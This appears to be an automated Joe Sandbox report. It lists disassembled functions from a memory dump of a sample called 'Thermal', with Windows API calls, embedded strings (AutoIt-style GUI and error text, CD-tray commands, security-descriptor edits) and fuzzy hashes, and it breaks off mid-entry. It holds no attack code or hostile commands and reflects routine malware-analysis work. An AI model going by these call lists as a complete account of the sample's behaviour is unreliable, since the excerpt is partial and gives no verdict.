                                                  • Part of subcall function 007FB1A9: PtInRect.USER32(?,?,007FC6BC), ref: 007FB258
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 007FCD38
                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007FCD43
                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007FCD66
                                                • _wcscat.LIBCMT ref: 007FCD96
                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007FCDAD
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 007FCDC6
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 007FCDDD
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 007FCDFF
                                                • DragFinish.SHELL32(?), ref: 007FCE06
                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007FCEF9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                • API String ID: 169749273-3440237614
                                                • Opcode ID: 2eb98d924064187a34612e0efa504deba756e83832751e88e79d3aff4539e761
                                                • Instruction ID: c2664d9e90ed52d02c3245a94a1196d44b8fafc9ea3b83b769d949577db39923
                                                • Opcode Fuzzy Hash: 2eb98d924064187a34612e0efa504deba756e83832751e88e79d3aff4539e761
                                                • Instruction Fuzzy Hash: 37617F71108304AFC711EF50DC89E6FBBE8FF84350F400A2DF6A5922A1DB759A49CB52
                                                APIs
                                                • VariantInit.OLEAUT32(00000000), ref: 007D831A
                                                • VariantCopy.OLEAUT32(00000000,?), ref: 007D8323
                                                • VariantClear.OLEAUT32(00000000), ref: 007D832F
                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007D841D
                                                • __swprintf.LIBCMT ref: 007D844D
                                                • VarR8FromDec.OLEAUT32(?,?), ref: 007D8479
                                                • VariantInit.OLEAUT32(?), ref: 007D852A
                                                • SysFreeString.OLEAUT32(?), ref: 007D85BE
                                                • VariantClear.OLEAUT32(?), ref: 007D8618
                                                • VariantClear.OLEAUT32(?), ref: 007D8627
                                                • VariantInit.OLEAUT32(00000000), ref: 007D8665
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                • API String ID: 3730832054-3931177956
                                                • Opcode ID: 6678bb529fad0b9d82dae0da4e17da9e4dc6d64f6ce050f4991cc1c2b8eef958
                                                • Instruction ID: a83e50969b77b4d089c47d2ecf2fba027d3547b4b808e179b8bd19f6f456892c
                                                • Opcode Fuzzy Hash: 6678bb529fad0b9d82dae0da4e17da9e4dc6d64f6ce050f4991cc1c2b8eef958
                                                • Instruction Fuzzy Hash: 9CD1D171604515EBDBA09F69D888B6EB7B4FF04B00F188557E419AB381DF38ED40DBA2
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 007F4A61
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007F4AAC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BuffCharMessageSendUpper
                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                • API String ID: 3974292440-4258414348
                                                • Opcode ID: ac496718d02e2cf59f870744930a61241445243b0e6f34d01b9813eefbdc8db1
                                                • Instruction ID: 03e60bb308e52ad6f9044c1e2e313743c000c1c9e2c9137d6ef84b9491149c0b
                                                • Opcode Fuzzy Hash: ac496718d02e2cf59f870744930a61241445243b0e6f34d01b9813eefbdc8db1
                                                • Instruction Fuzzy Hash: 51918970200715DFCB14EF20C855A7AB7A1BF94354F10885CFA965B3A2CB38ED4ACB92
                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 007DE31F
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 007DE32F
                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007DE33B
                                                • __wsplitpath.LIBCMT ref: 007DE399
                                                • _wcscat.LIBCMT ref: 007DE3B1
                                                • _wcscat.LIBCMT ref: 007DE3C3
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007DE3D8
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DE3EC
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DE41E
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DE43F
                                                • _wcscpy.LIBCMT ref: 007DE44B
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007DE48A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                • String ID: *.*
                                                • API String ID: 3566783562-438819550
                                                • Opcode ID: 702e8acddc4ab1acc41cb96e0a9c5294cb76a21a2ad181262061aeda234cbd7f
                                                • Instruction ID: faff6061c0f7c0c0721907221ac1108f60481ade9102d2ecc0471562f7736a1d
                                                • Opcode Fuzzy Hash: 702e8acddc4ab1acc41cb96e0a9c5294cb76a21a2ad181262061aeda234cbd7f
                                                • Instruction Fuzzy Hash: FF6139725047459FCB11EF60C848A9EB3F8BF89310F04891EF98987251DB39E945CB92
                                                APIs
                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007DA2C2
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007DA2E3
                                                • __swprintf.LIBCMT ref: 007DA33C
                                                • __swprintf.LIBCMT ref: 007DA355
                                                • _wprintf.LIBCMT ref: 007DA3FC
                                                • _wprintf.LIBCMT ref: 007DA41A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: LoadString__swprintf_wprintf$_memmove
                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 311963372-3080491070
                                                • Opcode ID: 4e0d558ce69c0ddc5eca318db849e61ac8e786cb6e5e092da6517e9e70139d03
                                                • Instruction ID: 6fe24bf3e8ac3bbf9c94635811f1e480c60819c7c8ff8bda0650fec2cc3b3114
                                                • Opcode Fuzzy Hash: 4e0d558ce69c0ddc5eca318db849e61ac8e786cb6e5e092da6517e9e70139d03
                                                • Instruction Fuzzy Hash: 9051AC71940219EACF24FBE0DD4AEEEB779BF04340F500166F405A2192EB392E5ACB61
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,007BF8B8,00000001,0000138C,00000001,00000000,00000001,?,007E3FF9,00000000), ref: 007D009A
                                                • LoadStringW.USER32(00000000,?,007BF8B8,00000001), ref: 007D00A3
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                • GetModuleHandleW.KERNEL32(00000000,00837310,?,00000FFF,?,?,007BF8B8,00000001,0000138C,00000001,00000000,00000001,?,007E3FF9,00000000,00000001), ref: 007D00C5
                                                • LoadStringW.USER32(00000000,?,007BF8B8,00000001), ref: 007D00C8
                                                • __swprintf.LIBCMT ref: 007D0118
                                                • __swprintf.LIBCMT ref: 007D0129
                                                • _wprintf.LIBCMT ref: 007D01D2
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007D01E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                • API String ID: 984253442-2268648507
                                                • Opcode ID: fecea5b55a365d5ace96353518dab55a18a634ecb3f9764f50d6a5396c46a4be
                                                • Instruction ID: 0bbc4d95dfd84d5bd7a4d6c5d9d4b681df060981c1969a569e16b4ebc93ed593
                                                • Opcode Fuzzy Hash: fecea5b55a365d5ace96353518dab55a18a634ecb3f9764f50d6a5396c46a4be
                                                • Instruction Fuzzy Hash: 29413F72840219EACF14FBE0DD9AEEEB77DEF14340F900155F505A2192DA396F4ACBA1
                                                APIs
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                • CharLowerBuffW.USER32(?,?), ref: 007DAA0E
                                                • GetDriveTypeW.KERNEL32 ref: 007DAA5B
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DAAA3
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DAADA
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DAB08
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                • API String ID: 2698844021-4113822522
                                                • Opcode ID: 5d6d6675abf976b4bdd359f1d4a59e7484774c40b7878e4165eb49dc73415c0f
                                                • Instruction ID: d7ca05c1da3260f2662f1152f2f05840dcda19c10f0d0814750bbddd97110a59
                                                • Opcode Fuzzy Hash: 5d6d6675abf976b4bdd359f1d4a59e7484774c40b7878e4165eb49dc73415c0f
                                                • Instruction Fuzzy Hash: 47514971204205EFC700EF20D88596AB3F8FF94758F50896DF895972A1DB39AD0ACB92
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007DA852
                                                • __swprintf.LIBCMT ref: 007DA874
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 007DA8B1
                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007DA8D6
                                                • _memset.LIBCMT ref: 007DA8F5
                                                • _wcsncpy.LIBCMT ref: 007DA931
                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007DA966
                                                • CloseHandle.KERNEL32(00000000), ref: 007DA971
                                                • RemoveDirectoryW.KERNEL32(?), ref: 007DA97A
                                                • CloseHandle.KERNEL32(00000000), ref: 007DA984
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                • String ID: :$\$\??\%s
                                                • API String ID: 2733774712-3457252023
                                                • Opcode ID: e3c6526f374e343ecae185e344c54876620da8a1d7ccda66d5c82b7e96870217
                                                • Instruction ID: b1bf7a3c3a6e5a8305ae805fc7d560bba8e475aabbfe62f1c3b8dd58dbdfa4dc
                                                • Opcode Fuzzy Hash: e3c6526f374e343ecae185e344c54876620da8a1d7ccda66d5c82b7e96870217
                                                • Instruction Fuzzy Hash: AB3172B1900219BBDB219FA0DC49FEB77BCFF89700F1041A6F909D6160EB7496458B25
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007F982C,?,?), ref: 007FC0C8
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC0DF
                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC0EA
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC0F7
                                                • GlobalLock.KERNEL32(00000000), ref: 007FC100
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC10F
                                                • GlobalUnlock.KERNEL32(00000000), ref: 007FC118
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC11F
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC130
                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00803C7C,?), ref: 007FC149
                                                • GlobalFree.KERNEL32(00000000), ref: 007FC159
                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 007FC17D
                                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 007FC1A8
                                                • DeleteObject.GDI32(00000000), ref: 007FC1D0
                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007FC1E6
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                • String ID:
                                                • API String ID: 3840717409-0
                                                • Opcode ID: c9bb940a85701a31db793b701cbb132586398a8b192edf00665ebef09e442321
                                                • Instruction ID: 15a4c91af5414fb111b0826c2f38e6d30d2910c93451207f60a79cdcd9e4ddda
                                                • Opcode Fuzzy Hash: c9bb940a85701a31db793b701cbb132586398a8b192edf00665ebef09e442321
                                                • Instruction Fuzzy Hash: 3641497160020CEFDB629F64DD88EAA7BB9FF89711F104058FA09E7260DB349941DF60
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007FC8A4
                                                • GetFocus.USER32 ref: 007FC8B4
                                                • GetDlgCtrlID.USER32(00000000), ref: 007FC8BF
                                                • _memset.LIBCMT ref: 007FC9EA
                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007FCA15
                                                • GetMenuItemCount.USER32(?), ref: 007FCA35
                                                • GetMenuItemID.USER32(?,00000000), ref: 007FCA48
                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007FCA7C
                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007FCAC4
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007FCAFC
                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007FCB31
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                • String ID: 0
                                                • API String ID: 1296962147-4108050209
                                                • Opcode ID: 2958512f4a48d2ef61f13d170c5f416929fb12bff8abb8beed154ae3cfcec8b0
                                                • Instruction ID: 1e39ef658cfa69bacb43d675871278810c3b7fac8f8f01c34d7a84ef50120ffc
                                                • Opcode Fuzzy Hash: 2958512f4a48d2ef61f13d170c5f416929fb12bff8abb8beed154ae3cfcec8b0
                                                • Instruction Fuzzy Hash: 53816CB06083099FD721CF14CA85A7A7BE9FB88354F00492DFA95A3391C774E905CFA2
                                                APIs
                                                  • Part of subcall function 007C8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C8E3C
                                                  • Part of subcall function 007C8E20: GetLastError.KERNEL32(?,007C8900,?,?,?), ref: 007C8E46
                                                  • Part of subcall function 007C8E20: GetProcessHeap.KERNEL32(00000008,?,?,007C8900,?,?,?), ref: 007C8E55
                                                  • Part of subcall function 007C8E20: HeapAlloc.KERNEL32(00000000,?,007C8900,?,?,?), ref: 007C8E5C
                                                  • Part of subcall function 007C8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C8E73
                                                  • Part of subcall function 007C8EBD: GetProcessHeap.KERNEL32(00000008,007C8916,00000000,00000000,?,007C8916,?), ref: 007C8EC9
                                                  • Part of subcall function 007C8EBD: HeapAlloc.KERNEL32(00000000,?,007C8916,?), ref: 007C8ED0
                                                  • Part of subcall function 007C8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007C8916,?), ref: 007C8EE1
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007C8B2E
                                                • _memset.LIBCMT ref: 007C8B43
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007C8B62
                                                • GetLengthSid.ADVAPI32(?), ref: 007C8B73
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 007C8BB0
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007C8BCC
                                                • GetLengthSid.ADVAPI32(?), ref: 007C8BE9
                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007C8BF8
                                                • HeapAlloc.KERNEL32(00000000), ref: 007C8BFF
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007C8C20
                                                • CopySid.ADVAPI32(00000000), ref: 007C8C27
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007C8C58
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007C8C7E
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007C8C92
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                • String ID:
                                                • API String ID: 3996160137-0
                                                • Opcode ID: 234397cbf12c7809a9d9ad1e8578972956ed35b0c6e8b3e9fbf49048902a32f3
                                                • Instruction ID: f723a31925bc5fc7abb3c3e3e0d073393d2e705b3120551a48b4fccbcdcf3064
                                                • Opcode Fuzzy Hash: 234397cbf12c7809a9d9ad1e8578972956ed35b0c6e8b3e9fbf49048902a32f3
                                                • Instruction Fuzzy Hash: 3E613771A00209EFDF509FA4DC45FAEBB79FF04300F0481AEE915A6291EB399A05CB61
                                                APIs
                                                • GetDC.USER32(00000000), ref: 007E7A79
                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007E7A85
                                                • CreateCompatibleDC.GDI32(?), ref: 007E7A91
                                                • SelectObject.GDI32(00000000,?), ref: 007E7A9E
                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007E7AF2
                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007E7B2E
                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007E7B52
                                                • SelectObject.GDI32(00000006,?), ref: 007E7B5A
                                                • DeleteObject.GDI32(?), ref: 007E7B63
                                                • DeleteDC.GDI32(00000006), ref: 007E7B6A
                                                • ReleaseDC.USER32(00000000,?), ref: 007E7B75
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                • String ID: (
                                                • API String ID: 2598888154-3887548279
                                                • Opcode ID: ce1c89ce6452a46be53d5338ea7d5cd489c446ddb598abfb8caff89c26bd1200
                                                • Instruction ID: 42062161530bf136b37acc7d2d978e49a320bf604dadcbdf96a138efe7568dd6
                                                • Opcode Fuzzy Hash: ce1c89ce6452a46be53d5338ea7d5cd489c446ddb598abfb8caff89c26bd1200
                                                • Instruction Fuzzy Hash: DB513771904649EFCB24CFA9CC85FAEBBB9FF48310F14842DE95AA7210D635A940CB60
                                                APIs
                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007DA4D4
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                • LoadStringW.USER32(?,?,00000FFF,?), ref: 007DA4F6
                                                • __swprintf.LIBCMT ref: 007DA54F
                                                • __swprintf.LIBCMT ref: 007DA568
                                                • _wprintf.LIBCMT ref: 007DA61E
                                                • _wprintf.LIBCMT ref: 007DA63C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
